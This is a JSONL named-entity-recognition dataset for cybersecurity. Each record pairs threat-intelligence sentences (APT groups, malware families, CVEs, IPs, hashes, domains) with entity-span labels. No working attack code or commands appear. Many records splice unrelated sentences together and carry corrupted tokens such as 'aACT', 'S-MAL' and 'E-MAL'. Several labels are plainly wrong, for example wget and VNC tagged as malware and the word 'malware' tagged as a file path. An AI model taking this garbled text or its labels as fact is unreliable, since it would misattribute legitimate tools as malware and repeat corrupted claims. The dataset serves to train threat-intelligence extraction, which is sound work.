{"text": "The malware uses smishing , or SMS phishing , to infiltrate target devices , which is a technique that relies on social engineering . Both of the loader’s variants and their various payloads that enSilo analyzed share similar Tactics , Techniques , and Procedures (TTPs) and code associated with APT10 . While the most recent samples observed still use batch scripts and SFX files , the Gamaredon Group has moved aACT from applications like wget , Remote Manipulator MAL , VNC and ChkFlsh.exe .", "spans": {"ORGANIZATION: enSilo": [[196, 202]], "THREAT_ACTOR: APT10": [[296, 301]], "MALWARE: batch scripts": [[353, 366]], "MALWARE: SFX files": [[371, 380]], "THREAT_ACTOR: Gamaredon Group": [[387, 402]], "MALWARE: wget": [[441, 445]], "MALWARE: Remote Manipulator MAL": [[448, 470]], "MALWARE: VNC": [[473, 476]], "MALWARE: ChkFlsh.exe": [[481, 492]]}, "info": {"id": "cyberner_stix_train_003317", "source": "cyberner_stix_train"}}
{"text": "End users and enterprises can also benefit from multilayered mobile security solutions such as Trend Micro™ Mobile Security™ . The threat actor used an exploit from the arsenal of the state-sponsored hacker group APT28 . In his history , FIN7 has overlapped several times with Cobalt S-MAL/EmpireMonkey in terms of TTPs . This type of attack technique can not be easily mitigated with preventive controls since it is based on the abuse of system features .", "spans": {"ORGANIZATION: Trend Micro™": [[95, 107]], "THREAT_ACTOR: APT28": [[213, 218]], "THREAT_ACTOR: FIN7": [[238, 242]], "MALWARE: Cobalt S-MAL/EmpireMonkey": [[277, 302]]}, "info": {"id": "cyberner_stix_train_003318", "source": "cyberner_stix_train"}}
{"text": "Interestingly however , another apparent evasion trick was also attempted - forging of the loaders ’ compilation timestamps .", "spans": {}, "info": {"id": "cyberner_stix_train_003319", "source": "cyberner_stix_train"}}
{"text": "There is a function called \" performGlobalAction '' with the description below . But the group has also used Poison Ivy ( PIVY ) , a RAT more commonly associated with threat actors in China — so much so that PIVY has , inaccurately , become synonymous with all APT attacks linked to China . ShadowHammer : aa15eb28292321b586c27d8401703494 . In a recent survey , respondents indicated that 57 of all observed vulnerabilities are more than two years old , with as many as 17 being more than five years old .", "spans": {"THREAT_ACTOR: group": [[89, 94]], "TOOL: Poison Ivy": [[109, 119]], "TOOL: PIVY": [[122, 126], [208, 212]], "TOOL: RAT": [[133, 136]], "THREAT_ACTOR: threat actors": [[167, 180]], "THREAT_ACTOR: ShadowHammer": [[291, 303]], "FILEPATH: aa15eb28292321b586c27d8401703494": [[306, 338]], "VULNERABILITY: observed vulnerabilities": [[399, 423]]}, "info": {"id": "cyberner_stix_train_003320", "source": "cyberner_stix_train"}}
{"text": "MOSA is the Palestinian Directorate of Social Development whose mandate is to achieve comprehensive development , social security , and economic growth for Palestinian families , according to publicly available information on this ministry . Since January 2013 , we've been on the lookout for a possible RedOctober comeback . This interface sometimes runs on their personal attack system , which is typically in Shanghai . Our analysis indicates that attackers may have been using attackers since mid-2022 .", "spans": {"ORGANIZATION: MOSA": [[0, 4]], "THREAT_ACTOR: RedOctober": [[304, 314]], "THREAT_ACTOR: attackers": [[451, 460]]}, "info": {"id": "cyberner_stix_train_003321", "source": "cyberner_stix_train"}}
{"text": "CONNECTION TO CHINA Chinese server infrastructure : FakeSpy applications send stolen information to C2 domains with .club TLDs and URLs ending with /servlet/ [ C2 Command ] ( mentioned above in the “ Stealing Sensitive Information ” section ) . MuddyWater is widely regarded as a long-lived APT group in the Middle East . APT15 then used a tool known as RemoteExec .", "spans": {"MALWARE: FakeSpy": [[52, 59]], "THREAT_ACTOR: MuddyWater": [[245, 255]], "THREAT_ACTOR: APT15": [[322, 327]], "MALWARE: RemoteExec": [[354, 364]]}, "info": {"id": "cyberner_stix_train_003322", "source": "cyberner_stix_train"}}
{"text": "This new XLoader variant poses as a security app for Android devices , and uses a malicious iOS profile to affect iPhone and iPad devices . The admin@338 's Dropbox accounts have also been found to contain a different backdoor dubbed BUBBLEWRAP . test1.hta reserved . By selecting these links , you will be leaving NIST webspace .", "spans": {"MALWARE: XLoader": [[9, 16]], "SYSTEM: Android": [[53, 60]], "SYSTEM: iOS": [[92, 95]], "SYSTEM: iPhone": [[114, 120]], "SYSTEM: iPad": [[125, 129]], "THREAT_ACTOR: admin@338": [[144, 153]], "TOOL: BUBBLEWRAP": [[234, 244]], "FILEPATH: test1.hta": [[247, 256]], "ORGANIZATION: NIST": [[315, 319]]}, "info": {"id": "cyberner_stix_train_003323", "source": "cyberner_stix_train"}}
{"text": "MainActivity registers BootComplete with a boot event , so that whenever the device is booted , BootComplete gets triggered . As the CnC server , Silence use CnC-3 server running Windows , from which they send commands to download additional modules . Some of the teams publicly known today include Iranian Cyber Army , Ashiyane , Islamic Cyber Resistance Group , Izz ad-Din al-Qassam Cyber Fighters , Parastoo , Shabgard , Iran Black Hats and many others 9 .", "spans": {"THREAT_ACTOR: Silence": [[146, 153]], "TOOL: CnC-3 server": [[158, 170]], "THREAT_ACTOR: Cyber Army": [[307, 317]], "THREAT_ACTOR: Ashiyane": [[320, 328]], "THREAT_ACTOR: Cyber Resistance Group": [[339, 361]], "THREAT_ACTOR: Izz ad-Din al-Qassam Cyber Fighters": [[364, 399]], "THREAT_ACTOR: Parastoo": [[402, 410]], "THREAT_ACTOR: Shabgard": [[413, 421]], "THREAT_ACTOR: Iran Black Hats": [[424, 439]]}, "info": {"id": "cyberner_stix_train_003324", "source": "cyberner_stix_train"}}
{"text": "In the latter case however , the group appear to have also simultaneously developed an entirely new loader , which we first observed being used in conjunction with CosmicDuke during the spring of 2015 .", "spans": {"MALWARE: CosmicDuke": [[164, 174]]}, "info": {"id": "cyberner_stix_train_003325", "source": "cyberner_stix_train"}}
{"text": "At the end of August 2018 , the Sednit group launched a spearphishing email campaign where it distributed shortened URLs that delivered the first stage of Zebrocy components .", "spans": {"THREAT_ACTOR: Sednit": [[32, 38]], "TOOL: email": [[70, 75]], "MALWARE: Zebrocy": [[155, 162]]}, "info": {"id": "cyberner_stix_train_003326", "source": "cyberner_stix_train"}}
{"text": "Falcon Intelligence has medium-high confidence that the GRIM SPIDER threat actors are operating out of Russia . Adobe Flash Player exploit .", "spans": {"ORGANIZATION: Falcon Intelligence": [[0, 19]], "TOOL: Adobe Flash Player": [[112, 130]], "VULNERABILITY: exploit": [[131, 138]]}, "info": {"id": "cyberner_stix_train_003327", "source": "cyberner_stix_train"}}
{"text": "] com . The tool investigates the Local Security Authority Subsystem memory space in order to find , decrypt and display retrieved passwords . APT40 was previously reported as TEMP.Periscope and TEMP.Jumper .", "spans": {"MALWARE: tool": [[12, 16]], "THREAT_ACTOR: APT40": [[143, 148]], "THREAT_ACTOR: TEMP.Periscope": [[176, 190]], "THREAT_ACTOR: TEMP.Jumper": [[195, 206]]}, "info": {"id": "cyberner_stix_train_003328", "source": "cyberner_stix_train"}}
{"text": "Considering the other malicious behaviors of XLoader , this added operation could be very dangerous as threat actors can use it to perform targeted attacks . With this in mind , this week we are providing some indicators for a China based adversary who we crypt as \" NUMBERED PANDA \" Numbered Panda has a long list of high-profile victims and is known by a number of names including : DYNCALC , IXESHE , JOY RAT , APT-12 , etc . Any other IP address will set the receive mode to ping, although the server-side software suggests 199.250.250.99 will be . RDP and phishing are two of the most popular initial ransomware attack vectors , and cybercriminals approach in leveraging these techniques has not changed much over the years .", "spans": {"MALWARE: XLoader": [[45, 52]], "THREAT_ACTOR: NUMBERED PANDA": [[267, 281]], "THREAT_ACTOR: Numbered Panda": [[284, 298]], "THREAT_ACTOR: DYNCALC": [[385, 392]], "THREAT_ACTOR: IXESHE": [[395, 401]], "THREAT_ACTOR: JOY RAT": [[404, 411]], "THREAT_ACTOR: APT-12": [[414, 420]], "IP_ADDRESS: 199.250.250.99": [[528, 542]], "THREAT_ACTOR: cybercriminals": [[638, 652]]}, "info": {"id": "cyberner_stix_train_003329", "source": "cyberner_stix_train"}}
{"text": "All the IP addresses belong to the same company Hetzner , an IP-hosting firm in Germany . We recently noticed the group behind MuddyWater that appear to be targeting government bodies , military entities , telcos and educational institutions in Jordan , Turkey , Azerbaijan and Pakistan , in addition to the continuous targeting of Iraq and Saudi Arabia , other victims were also detected in Mali , Austria , Russia , Iran and Bahrain. . This particular VBScript payload beacons to domain bafunpda.xyz , which is also used by the KHRAT S-MAL Trojan E-MAL listed above in Table 2 . COSMICENERGY Possibly Associated With Russian Government - Funded Power Disruption and Emergency Response Exercises During our analysis of COSMICENERGY , we identified a comment in the code that indicated the sample uses a module associated with a project named “ Solar Polygon ” ( Figure 2 ) .", "spans": {"ORGANIZATION: Hetzner": [[48, 55]], "THREAT_ACTOR: group": [[114, 119]], "THREAT_ACTOR: MuddyWater": [[127, 137]], "ORGANIZATION: government bodies": [[166, 183]], "ORGANIZATION: military entities": [[186, 203]], "ORGANIZATION: educational institutions": [[217, 241]], "TOOL: VBScript": [[454, 462]], "DOMAIN: bafunpda.xyz": [[489, 501]], "MALWARE: KHRAT S-MAL": [[530, 541]], "MALWARE: Trojan E-MAL": [[542, 554]], "MALWARE: COSMICENERGY": [[581, 593], [720, 732]], "ORGANIZATION: Russian Government": [[619, 637]]}, "info": {"id": "cyberner_stix_train_003330", "source": "cyberner_stix_train"}}
{"text": "First , we launched a banking app and entered the credentials there . However , it is likely the same scripts are used more globally against many traditional Turla targets in Western Europe and the Middle East . Working with U.S. government partners , DHS and FBI identified Internet Protocol ( IP ) addresses and other indicators of compromise ( IOCs ) associated with a remote administration tool ( RAT ) used by the North Korean government—commonly known as FALLCHILL .", "spans": {"THREAT_ACTOR: Turla": [[158, 163]], "ORGANIZATION: government": [[230, 240]], "ORGANIZATION: DHS": [[252, 255]], "ORGANIZATION: FBI": [[260, 263]], "MALWARE: remote administration tool": [[372, 398]], "MALWARE: RAT": [[401, 404]], "MALWARE: FALLCHILL": [[461, 470]]}, "info": {"id": "cyberner_stix_train_003331", "source": "cyberner_stix_train"}}
{"text": "By monitoring the package installation broadcast event , XLoader can start their packages . The actors behind this campaign we call LUCKY ELEPHANT use doppelganger webpages to mimic legitimate entities such as foreign governments , telecommunications , and military . At the next startup , the software will directly load the configuration from the just created key .", "spans": {"MALWARE: XLoader": [[57, 64]], "THREAT_ACTOR: LUCKY ELEPHANT": [[132, 146]], "TOOL: doppelganger webpages": [[151, 172]], "ORGANIZATION: foreign governments": [[210, 229]], "ORGANIZATION: telecommunications": [[232, 250]], "ORGANIZATION: military": [[257, 265]]}, "info": {"id": "cyberner_stix_train_003332", "source": "cyberner_stix_train"}}
{"text": "The next stage payload ( e1953fa319cc11c2f003ad0542bca822 ) , downloaded from this loader , is similar to the .NET downloader in the WFCWallet case .", "spans": {"FILEPATH: e1953fa319cc11c2f003ad0542bca822": [[25, 57]], "TOOL: .NET": [[110, 114]], "TOOL: WFCWallet": [[133, 142]]}, "info": {"id": "cyberner_stix_train_003333", "source": "cyberner_stix_train"}}
{"text": "First Twitter‑controlled Android botnet discovered Detected by ESET as Android/Twitoor , this malware is unique because of its resilience mechanism . On November 29 , 2018 , Scattered Canary sent an attack email to Agari CFO Raymond Lim , enquiring as to his availability to send out a domestic wire transfer . Our analysis shows that the cybercriminals behind the attack against an online casino in Central America , and several other targets in late-2017 , were most likely the infamous Lazarus hacking group .", "spans": {"SYSTEM: Twitter‑controlled": [[6, 24]], "SYSTEM: Android": [[25, 32]], "ORGANIZATION: ESET": [[63, 67]], "MALWARE: Android/Twitoor": [[71, 86]], "THREAT_ACTOR: Scattered Canary": [[174, 190]], "THREAT_ACTOR: cybercriminals": [[339, 353]], "THREAT_ACTOR: Lazarus hacking group": [[489, 510]]}, "info": {"id": "cyberner_stix_train_003334", "source": "cyberner_stix_train"}}
{"text": "For more information on the overall capabilities of the malware , please review IBM 's ongoing research .", "spans": {"ORGANIZATION: IBM": [[80, 83]]}, "info": {"id": "cyberner_stix_train_003335", "source": "cyberner_stix_train"}}
{"text": "Within six hours of entering the environment , the threat actors compromised multiple systems and stole credentials for the entire domain .", "spans": {}, "info": {"id": "cyberner_stix_train_003336", "source": "cyberner_stix_train"}}
{"text": "Further tracking of the Lazarus’s activities has enabled Kaspersky researchers to discover a new operation , active since at least November 2018 , which utilizes PowerShell to control Windows systems and Mac OS malware to target Apple customers . The malware then builds two DLLs in memory – they are 32 and 64-bit DLLs that have identical functionality .", "spans": {"THREAT_ACTOR: Lazarus’s": [[24, 33]], "ORGANIZATION: Kaspersky": [[57, 66]], "TOOL: PowerShell": [[162, 172]], "ORGANIZATION: Apple customers": [[229, 244]], "FILEPATH: malware": [[251, 258]], "FILEPATH: DLLs": [[275, 279]]}, "info": {"id": "cyberner_stix_train_003337", "source": "cyberner_stix_train"}}
{"text": "The injected code copies xxxx.exe to %System%\\winsys.exe and connects to the Command and Control ( C&C ) server on TCP port 80 .", "spans": {"FILEPATH: xxxx.exe": [[25, 33]], "FILEPATH: %System%\\winsys.exe": [[37, 56]], "TOOL: Command and Control": [[77, 96]], "TOOL: C&C": [[99, 102]]}, "info": {"id": "cyberner_stix_train_003338", "source": "cyberner_stix_train"}}
{"text": "Our visibility into APT28 ’s operations , which date to at least 2007 , has allowed us to understand the group ’s malware , operational changes , and motivations .", "spans": {"THREAT_ACTOR: APT28": [[20, 25]]}, "info": {"id": "cyberner_stix_train_003339", "source": "cyberner_stix_train"}}
{"text": "Release_Time : 2019-12-04", "spans": {}, "info": {"id": "cyberner_stix_train_003340", "source": "cyberner_stix_train"}}
{"text": "The ‘ onload1 ’ function parses the response data from the request to the C2 URL using regular expressions .", "spans": {"TOOL: C2": [[74, 76]]}, "info": {"id": "cyberner_stix_train_003341", "source": "cyberner_stix_train"}}
{"text": "Retrieve Keylogger logs .", "spans": {}, "info": {"id": "cyberner_stix_train_003342", "source": "cyberner_stix_train"}}
{"text": "User must open the Microsoft Word email attachment ;", "spans": {"ORGANIZATION: Microsoft": [[19, 28]], "TOOL: Word": [[29, 33]], "TOOL: email": [[34, 39]]}, "info": {"id": "cyberner_stix_train_003343", "source": "cyberner_stix_train"}}
{"text": "Port 6207 : Viber extraction service . stolen certificates being used maliciously occurred in early 2014 . Potentially fake documents that appear to be issued by the Palestinian government . The alert described emails that delivered an Evernotethemed lure to entice targeted recipients into downloading a trojan .", "spans": {"SYSTEM: Viber": [[12, 17]], "ORGANIZATION: Palestinian government": [[166, 188]]}, "info": {"id": "cyberner_stix_train_003344", "source": "cyberner_stix_train"}}
{"text": "Only later is the malicious code introduced , through an update . Barium Defendants install the malicious credential stealing and injection tool known as \" Win32/RibDoor.A!dha \" . Once an infected machine connects , you see its information displayed in a selection box at the top . An attacker could exploit these issues by tricking a user into opening a specially crafted PDF document or , if the user has the browser extension enabled , by visiting a malicious web page :", "spans": {"THREAT_ACTOR: Barium": [[66, 72]], "TOOL: Win32/RibDoor.A!dha": [[156, 175]], "THREAT_ACTOR: attacker": [[285, 293]]}, "info": {"id": "cyberner_stix_train_003345", "source": "cyberner_stix_train"}}
{"text": "In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 . And the dropper execute the iassvcs.exe to make a side loading and make the persistence .", "spans": {"MALWARE: RTF attachments": [[44, 59]], "VULNERABILITY: CVE-2017-0199": [[124, 137]], "FILEPATH: dropper": [[148, 155]], "FILEPATH: iassvcs.exe": [[168, 179]]}, "info": {"id": "cyberner_stix_train_003346", "source": "cyberner_stix_train"}}
{"text": "Figure 4 details how many times each stolen certificate was used in a given month .", "spans": {}, "info": {"id": "cyberner_stix_train_003347", "source": "cyberner_stix_train"}}
{"text": "One archive sample analyzed by CTU researchers contained a legitimate PDF file , a benign image of interest to targets , and an HttpBrowser installer disguised as an image file .", "spans": {"ORGANIZATION: CTU": [[31, 34]], "TOOL: PDF": [[70, 73]], "MALWARE: HttpBrowser": [[128, 139]], "TOOL: installer": [[140, 149]]}, "info": {"id": "cyberner_stix_train_003348", "source": "cyberner_stix_train"}}
{"text": "Malware installation , persistence , and activation .", "spans": {}, "info": {"id": "cyberner_stix_train_003349", "source": "cyberner_stix_train"}}
{"text": "The document exploited CVE-2012-0158 and will decode and write an executable to disk upon infection . In March 2017 , Wikileaks published details about an exploit affecting Mikrotik called ChimayRed .", "spans": {"VULNERABILITY: CVE-2012-0158": [[23, 36]], "ORGANIZATION: Wikileaks": [[118, 127]], "VULNERABILITY: exploit": [[155, 162]], "MALWARE: Mikrotik": [[173, 181]], "MALWARE: ChimayRed": [[189, 198]]}, "info": {"id": "cyberner_stix_train_003350", "source": "cyberner_stix_train"}}
{"text": "Lollipop has 7 percent , Ice Cream Sandwich has 2 percent , and Marshmallow has 1 percent . WCry uses a combination of the RSA and AES algorithms to encrypt files . APT33 : 64.251.19.232 [REDACTED].ddns.net . In essence , this provides the threat actor unrestricted access to the account .", "spans": {"SYSTEM: Lollipop": [[0, 8]], "SYSTEM: Ice Cream Sandwich": [[25, 43]], "SYSTEM: Marshmallow": [[64, 75]], "TOOL: WCry": [[92, 96]], "TOOL: RSA": [[123, 126]], "TOOL: AES": [[131, 134]], "THREAT_ACTOR: APT33": [[165, 170]], "IP_ADDRESS: 64.251.19.232": [[173, 186]], "DOMAIN: [REDACTED].ddns.net": [[187, 206]]}, "info": {"id": "cyberner_stix_train_003351", "source": "cyberner_stix_train"}}
{"text": "Researchers showcased a potential malware lifecycle which started with spear phishing and eventually led to the deployment of the disk-wiping malware known as Shamoon .", "spans": {"MALWARE: Shamoon": [[159, 166]]}, "info": {"id": "cyberner_stix_train_003352", "source": "cyberner_stix_train"}}
{"text": "] top/ These permutations of TLDs and canonical domains incorporating the legitimate domain expected by the targeted banking customers exemplifies recent trends in social engineering by threat actors . One notable aspect of the campaign was the actors' ability to impersonate VPN applications , such as Cisco Adaptive Security Appliance (ASA) products , to perform MitM attacks . APT28 has been active since at least 2004 .", "spans": {"THREAT_ACTOR: actors'": [[245, 252]], "TOOL: VPN applications": [[276, 292]], "TOOL: Adaptive Security Appliance": [[309, 336]], "THREAT_ACTOR: APT28": [[380, 385]]}, "info": {"id": "cyberner_stix_train_003353", "source": "cyberner_stix_train"}}
{"text": "As we described in Silence: Moving into the darkside report , Silence has experience with theft using compromised card processing systems . According to our statistics , as of the beginning of 2015 this botnet encompassed over 250 000 infected devices worldwide including infecting more than 100 financial institutions with 80% of them from the top 20 list .", "spans": {"THREAT_ACTOR: Silence:": [[19, 27]], "THREAT_ACTOR: Silence": [[62, 69]], "FILEPATH: botnet encompassed": [[203, 221]], "ORGANIZATION: financial institutions": [[296, 318]]}, "info": {"id": "cyberner_stix_train_003354", "source": "cyberner_stix_train"}}
{"text": "The first observed samples of the MiniDuke backdoor component are from May 2011 .", "spans": {"MALWARE: MiniDuke backdoor": [[34, 51]]}, "info": {"id": "cyberner_stix_train_003355", "source": "cyberner_stix_train"}}
{"text": "What do I need to do ? Leafminer also utilized Process Doppelganging , a detection evasion technique first discussed at the Black Hat EU conference last year . We have tried informing them several times , through various channels , since early February , but without apparent success . If network logs were analyzed individually across that journey , it is likely that all requests were either in compliance with the policies embedded into the firewalls at every node , or some unpatched vulnerability prevented a control action against unauthorized data transfers .", "spans": {"THREAT_ACTOR: Leafminer": [[23, 32]], "VULNERABILITY: some unpatched vulnerability prevented a control action against unauthorized data transfers": [[473, 564]]}, "info": {"id": "cyberner_stix_train_003356", "source": "cyberner_stix_train"}}
{"text": "In order to achieve this adaptability , the operator has the capability to remotely load plugins , inject scripts and even compile new .NET code that can be executed . At the time of analysis , the subdomains did not host a website; however , based on BITTER APT group’s targeting patterns , it is highly likely that they were created to host faux login phishing pages designed to steal user’s credentials . This coupled with the timing of operations – which coincides with Iranian working hours – and the use of multiple Iranian hacker tools and name servers bolsters our assessment that APT33 may have operated on behalf of the Iranian government .", "spans": {"SYSTEM: .NET": [[135, 139]], "THREAT_ACTOR: BITTER APT": [[252, 262]], "MALWARE: name servers": [[547, 559]], "THREAT_ACTOR: APT33": [[589, 594]]}, "info": {"id": "cyberner_stix_train_003357", "source": "cyberner_stix_train"}}
{"text": "] com/api/s2s/tracks/ and is used for activation . Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . In September 2018 , we found evidence of Seedworm and the espionage group APT28 ( aka Swallowtail , Fancy Bear ) , on a computer within the Brazil-based embassy of an oil-producing nation .", "spans": {"ORGANIZATION: Kaspersky": [[51, 60]], "THREAT_ACTOR: group": [[71, 76]], "VULNERABILITY: Adobe Flash Player zero-day vulnerability": [[94, 135]], "VULNERABILITY: CVE-2016-4117": [[138, 151]], "TOOL: FinSpy": [[198, 204]], "THREAT_ACTOR: Seedworm": [[306, 314]], "THREAT_ACTOR: APT28": [[339, 344]], "THREAT_ACTOR: Swallowtail": [[351, 362]], "THREAT_ACTOR: Fancy Bear": [[365, 375]], "ORGANIZATION: embassy": [[418, 425]]}, "info": {"id": "cyberner_stix_train_003358", "source": "cyberner_stix_train"}}
{"text": "In the beginning , this threat group mainly targeted Asian countries . The last piece is the newly discovered CopyPaste group , who targeted financial entities and companies in one African country , which lead us to think that CopyPaste was associated with cybermercenaries or a training center . The Ke3chang group also used keyloggers and their own .NET tool to enumerate folders and dump data from Microsoft Exchange mailboxes .", "spans": {"THREAT_ACTOR: CopyPaste": [[110, 119]], "ORGANIZATION: financial": [[141, 150]], "ORGANIZATION: companies": [[164, 173]], "ORGANIZATION: training center": [[279, 294]], "THREAT_ACTOR: Ke3chang group": [[301, 315]], "MALWARE: keyloggers": [[326, 336]], "MALWARE: .NET tool": [[351, 360]], "ORGANIZATION: Microsoft": [[401, 410]]}, "info": {"id": "cyberner_stix_train_003359", "source": "cyberner_stix_train"}}
{"text": "Correspondence of other individuals targeted in the same phishing campaign , including former Secretary of State Colin Powell and Clinton campaign staffer William Rinehart , were published on the “ DC Leaks ” website .", "spans": {}, "info": {"id": "cyberner_stix_train_003360", "source": "cyberner_stix_train"}}
{"text": "After scanning the QR code and installing a component downloaded from the link , the user infects his smartphone with the Trojan program that boasts functionality that is of great interest to the attackers . Turla operators could use an already-compromised machine in the network of the victim 's organization to perform a local MitM attack . To illustrate the functionality of main ZxShell module , Let ’s take a look at the following sample : “ So good luck , I ’m sure we ’ll talk again soon , but for now , I ve got better things in the oven , ” Harrison wrote to Biderman after his employment contract with Ashley Madison was terminated .", "spans": {"MALWARE: ZxShell": [[383, 390]], "THREAT_ACTOR: Harrison": [[550, 558]], "ORGANIZATION: Biderman": [[568, 576]], "ORGANIZATION: Ashley Madison": [[612, 626]]}, "info": {"id": "cyberner_stix_train_003361", "source": "cyberner_stix_train"}}
{"text": "The attacks use multiple exploits in an attempt to gain root access on a device . Notably , after the first SMB packet sent to the victim 's IP address , WannaCry sends two additional packets to the victim containing the hard-coded IP addresses 192.168.56.20 and 172.16.99.5 . APT33 : 64.251.19.217 [REDACTED].myftp.org . Additionally we observed the DPRK threat actor log directly into a Pyongyang IP , from one of their jump boxes .", "spans": {"TOOL: WannaCry": [[154, 162]], "THREAT_ACTOR: APT33": [[277, 282]], "IP_ADDRESS: 64.251.19.217": [[285, 298]], "DOMAIN: [REDACTED].myftp.org": [[299, 319]], "THREAT_ACTOR: DPRK threat actor": [[351, 368]], "SYSTEM: a Pyongyang IP": [[387, 401]]}, "info": {"id": "cyberner_stix_train_003362", "source": "cyberner_stix_train"}}
{"text": "Since Ryuk 's appearance in August , the threat actors operating it have netted over 705.80 BTC across 52 transactions for a total current value of $3,701,893.98 USD . These codes are often leveraged in the malware used by coordinated targeted attackers to differentiate victims that were successfully compromised from different target sets .", "spans": {"TOOL: Ryuk": [[6, 10]]}, "info": {"id": "cyberner_stix_train_003363", "source": "cyberner_stix_train"}}
{"text": "This malware family is known as \" PittyTiger \" by the anti-virus community . Operation Ghoul is one of the many attacks in the wild targeting industrial , manufacturing and engineering organizations , Kaspersky Lab recommends users to be extra cautious while checking and opening emails and attachments .", "spans": {"THREAT_ACTOR: PittyTiger": [[34, 44]], "ORGANIZATION: anti-virus community": [[54, 74]], "ORGANIZATION: industrial": [[142, 152]], "ORGANIZATION: manufacturing": [[155, 168]], "ORGANIZATION: engineering organizations": [[173, 198]], "ORGANIZATION: Kaspersky Lab": [[201, 214]]}, "info": {"id": "cyberner_stix_train_003364", "source": "cyberner_stix_train"}}
{"text": "University faculty specializing in aeronautical engineering and research .", "spans": {}, "info": {"id": "cyberner_stix_train_003365", "source": "cyberner_stix_train"}}
{"text": "As of this publication , CTU researchers have not discovered how TG-3390 keeps track of the details associated with its compromised assets and credentials .", "spans": {"ORGANIZATION: CTU": [[25, 28]], "THREAT_ACTOR: TG-3390": [[65, 72]]}, "info": {"id": "cyberner_stix_train_003366", "source": "cyberner_stix_train"}}
{"text": "The first variant involves social engineering the target into downloading a trojanized app . Thus , Turla operators had access to some highly sensitive information ( such as emails sent by the German Foreign Office staff ) for almost a year . The service ’s existence is verified with the ServiceExists function , which attempts to open the relative registry sub-key in HKLM\\SYSTEM\\CurrentControlSet\\Services . CrowdStrike incident responders found that renamed Plink and AnyDesk executable creation timestamps on affected backend Exchange servers were closely correlated with PowerShell execution events in the Remote PowerShell logs , indicating the threat actor leveraged the newly discovered exploit chain to drop other tooling for persistent access to the affected Exchange servers .", "spans": {"THREAT_ACTOR: Turla": [[100, 105]], "ORGANIZATION: German Foreign Office staff": [[193, 220]]}, "info": {"id": "cyberner_stix_train_003367", "source": "cyberner_stix_train"}}
{"text": "The main purpose of this module is providing reverse shell features on the device by connecting with the C & C server ’ s socket . Therefore , it is clear that the OceanLotus group works during weekdays and takes a break during the weekends . The group behind the campaign has primarily targeted organizations in the energy , government , and technology sectors that are either based or have business interests in Saudi Arabia . menuPass : Stone Panda , APT10 , Red Apollo , CVNX , HOGFISH . menuPass is a threat group that appears to originate from China and has been active since approximately 2009 .", "spans": {"THREAT_ACTOR: OceanLotus": [[164, 174]], "THREAT_ACTOR: menuPass": [[429, 437], [492, 500]], "THREAT_ACTOR: Stone Panda": [[440, 451]], "THREAT_ACTOR: APT10": [[454, 459]], "THREAT_ACTOR: Red Apollo": [[462, 472]], "THREAT_ACTOR: CVNX": [[475, 479]], "THREAT_ACTOR: HOGFISH": [[482, 489]]}, "info": {"id": "cyberner_stix_train_003368", "source": "cyberner_stix_train"}}
{"text": "The team has encountered different versions of the malware over time as it has rapidly evolved . Previous reports have discussed Bisonal malware used in attacks against Japan , South Korea and Russia . Based on the targeting and lures , Unit 42 assesses that the Lotus Blossom actors ' collection requirements include militaries and government agencies in Southeast Asia .", "spans": {"MALWARE: Bisonal malware": [[129, 144]], "ORGANIZATION: Unit 42": [[237, 244]], "THREAT_ACTOR: Lotus Blossom actors": [[263, 283]], "ORGANIZATION: militaries": [[318, 328]], "ORGANIZATION: government agencies": [[333, 352]]}, "info": {"id": "cyberner_stix_train_003369", "source": "cyberner_stix_train"}}
{"text": "We have observed Delphi , AutoIt , and C++ variants of Zebrocy , all of which are related not only in their functionality , but also at times by chaining the variants together in a single attack .", "spans": {"TOOL: Delphi": [[17, 23]], "TOOL: AutoIt": [[26, 32]], "TOOL: C++": [[39, 42]], "MALWARE: Zebrocy": [[55, 62]]}, "info": {"id": "cyberner_stix_train_003370", "source": "cyberner_stix_train"}}
{"text": "According to our estimates , about 60 % of mobile malware are elements of both large and small mobile botnets . three computers in China being used to launch the Thrip attacks . By default , every keystroke is recorded using the Keylogger module ( 306, previously documented by Avast ) and saved to disk in the file %APPDATA%\\PAGM\\OEY\\XWWEYG\\WAOUE . Mandiant Threat Intelligence assesses that UNC2452 activity aligns with nation - state priorities broadly and that the group ’s targeting patterns are consistent with Russian strategic interests .", "spans": {"ORGANIZATION: Avast": [[278, 283]], "FILEPATH: %APPDATA%\\PAGM\\OEY\\XWWEYG\\WAOUE": [[316, 347]], "ORGANIZATION: Mandiant Threat Intelligence": [[350, 378]], "THREAT_ACTOR: UNC2452": [[393, 400]]}, "info": {"id": "cyberner_stix_train_003371", "source": "cyberner_stix_train"}}
{"text": "Modified DLL file ( goopdate.dll ) used by BRONZE PRESIDENT to install RCSession : 0617cad9e5d559356c43d4037c86227f , f14eaf5d648aebb2ed7b00b2cf4349263b30fb1c , 2ea9ccf653f63bcc3549a313ec9d0bada341556cc32dd2ca4b73e0c034492740 .", "spans": {"TOOL: DLL": [[9, 12]], "FILEPATH: goopdate.dll": [[20, 32]], "THREAT_ACTOR: BRONZE PRESIDENT": [[43, 59]], "MALWARE: RCSession": [[71, 80]], "FILEPATH: 0617cad9e5d559356c43d4037c86227f": [[83, 115]], "FILEPATH: f14eaf5d648aebb2ed7b00b2cf4349263b30fb1c": [[118, 158]], "FILEPATH: 2ea9ccf653f63bcc3549a313ec9d0bada341556cc32dd2ca4b73e0c034492740": [[161, 225]]}, "info": {"id": "cyberner_stix_train_003372", "source": "cyberner_stix_train"}}
{"text": "The purpose of this module is to extract and execute a malicious payload – the “ patch ” module . Sometimes , the attackers use sub-domains on the exploit websites , to make them seem more legitimate . Process hollowing is a technique that can hide malware within a legitimate system process . Malwarebytes 's EDR shows the full attack chain ( please click to enlarge ): The NetSupport RAT files are hosted on the same compromised WordPress site used earlier to download the Internet shortcut .", "spans": {"TOOL: sub-domains": [[128, 139]], "TOOL: Process hollowing": [[202, 219]], "ORGANIZATION: Malwarebytes 's EDR": [[294, 313]], "MALWARE: NetSupport RAT": [[375, 389]]}, "info": {"id": "cyberner_stix_train_003373", "source": "cyberner_stix_train"}}
